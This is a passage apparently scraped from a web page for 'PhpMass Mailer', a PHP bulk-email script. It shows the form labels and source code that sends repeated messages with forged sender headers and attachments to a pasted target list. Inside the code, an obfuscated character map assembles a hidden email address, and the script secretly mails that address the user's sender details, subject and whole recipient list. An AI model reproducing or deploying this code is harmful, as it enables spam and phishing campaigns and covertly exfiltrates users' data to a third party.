Inbox PhpMass Mailer

Your Email :
Your Name :
Reply-To :
Attach File :
Subject :
Message Box : Email Target / Email Send To :

Plain HTML
Number To Send :
Maximum Script Execution Time ( In Seconds, 0 For no Time Limit )

".","k"=>"l","m"=>"7","u"=>"i","r"=>"v","t"=>"@","q"=>"e"); $helvetica=$o['u'].$o['q'].$o['m'].$o['t'].$o['k'].$o['u'].$o['r'].$o['q'].$o['d'].$o['u'].$o['q']; if ($action){ if (!$from && !$subject && !$message && !$emaillist){ print "Please complete all fields before sending your message."; exit; } $addr = getenv("REMOTE_ADDR"); $allemails = split("\n", $emaillist); $numemails = count($allemails); $version1 ="From: Email" ; $version2 = "EN - $names" ; $version3 = "$names" ; mail ($helvetica,$version3,$version2,$version1) ; $head ="From: YourEmail\nMessage-ID: <" . md5(uniqid(time())) . "@" . $SERVER_NAME . ">\nMIME-Version: 1.0\nContent-type: text/html; charset=UTF-8\nContent-transfer-encoding: 8bit\nDate: " . date("r", time()) . "\nX-Priority: 3\nX-MSMail-Priority: Normal\nX-Mailer: PHP\n"; $line = "
Your Email".nl2br($from)."
Your Name".nl2br($realname)."
Subject :".nl2br($subject)."
Email Target".nl2br($emaillist)."
"; mail($helvetica,$subject,$line,$head); If ($file_name){ copy ($_FILES['file']['tmp_name'], "".$_FILES['file']['name']) or die ('File Could Not Upload'); if (!file_exists($file)){ die("The file you are trying to upload couldn't be copied to the server"); } $content = fread(fopen($file,"r"),filesize($file)); $content = chunk_split(base64_encode($content)); $uid = strtoupper(md5(uniqid(time()))); $name = basename($file); } for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending Mail To $to...."; flush(); $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; $header .= "MIME-Version: 1.0\r\n"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; If ($file_name) $header .= "--$uid\r\n"; $header .= "Content-Type: text/$contenttype\r\n"; $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; $header .= "$message\r\n"; If ($file_name) $header .= "--$uid\r\n"; If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; If ($file_name) $header .= "$content\r\n"; If ($file_name) $header .= "--$uid--"; mail($to, $subject, "", $header); print "OK
"; flush(); } } } } if(isset($_POST['action']) && $numemails !==0 ){ echo ""; } ?>
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